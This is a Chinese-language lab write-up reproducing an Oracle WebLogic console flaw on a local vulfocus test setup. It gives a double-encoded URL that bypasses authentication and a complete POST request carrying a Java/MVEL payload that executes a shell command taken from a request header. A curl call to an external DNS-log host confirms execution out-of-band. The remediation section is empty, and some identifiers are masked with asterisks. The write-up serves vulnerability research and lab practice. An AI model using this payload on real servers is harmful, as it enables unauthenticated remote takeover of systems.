漏洞名称
漏洞描述
Oracle Fusion Middleware的Oracle WebLogic Server产品中的漏洞(组件:控制台),允许未经身份验证的攻击者通过HTTP访问网络,从而导致Oracle WebLogic Server被接管。
影响版本
Oracle WebLogic Server 10.3.6.0.0
Oracle WebLogic Server 12.1.3.0.0
Oracle WebLogic Server 12.2.1.3.0
Oracle WebLogic Server 12.2.1.4.0
Oracle WebLogic Server 14.1.1.0.0
漏洞复现
环境搭建
受害者IP:
192.168.63.129:7001
192.168.63.129:7002
192.168.63.1295556
攻击者IP:
192.168.63.1
vulfocus下载链接
https://github.***/fofapro/vulfocus
git clone https://github.***/fofapro/vulfocus.git
启动vulfocus
docker-***pose up -d
环境启动后,访问http://192.168.63.129:7001/console/login/LoginForm.jsp,说明已成功启动。
漏洞利用
需要注意的是,需要我们先登录才行,不登陆就无法进行未授权,weblogic/wel***e1。这里我是在虚拟机里面进行登录的,下面的验证是在本机进行验证的。
在虚拟机登录成功。
访问经过二次编码的url,发现有些浏览器可以绕过登录,比如火狐浏览器或者谷歌浏览器。
http://192.168.63.129:7001/console/css/%252e%252e%252fconsole.portal
但是,使用其他浏览器发现绕过失败,使用下面的payload可以绕过。
http://192.168.63.129:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=DomainConfigGeneralPage&handle=***.bea.console.handles.JMXHandle%28%22***.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29
通过burp抓包,使用post请求方式进行任意命令执行,在响应体中返回302和localtion跳转信息。在请求头字段cmd加入payload,使用dnslog平台dns带外进行命令执行,
POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: 192.168.63.129:7001
Content-Type: application/x-www-form-urlencoded
Content-Length: 1364
cmd: whoami&curl {{*.ceye.io}}
_nfpb=true&_pageLabel=&handle=***.tangosol.coherence.mvel2.sh.ShellSession(\"weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\x0d\x0aweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\x0d\x0ajava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");\x0d\x0afield.setA***essible(true);\x0d\x0aObject obj = field.get(adapter);\x0d\x0aweblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\"getServletRequest\").invoke(obj);\x0d\x0aString cmd = req.getHeader(\"cmd\");\x0d\x0aString[] cmds = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", cmd} : new String[]{\"/bin/sh\", \"-c\", cmd};\x0d\x0aif (cmd != null) {\x0d\x0a String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\"\\\\A\").next();\x0d\x0a weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod(\"getResponse\").invoke(req);\x0d\x0a res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));\x0d\x0a res.getServletOutputStream().flush();\x0d\x0a res.getWriter().write(\"\");\x0d\x0a}executeThread.interrupt();
在dnslog平台中返回信息,但是没有返回whoami的信息,具体什么原因未知,博主这里没有进一步测试,查看资料msf可以进行命令执行,有兴趣的小伙伴可以试一下。这里后续在补充。
修复建议
1、懒得写,后续在补充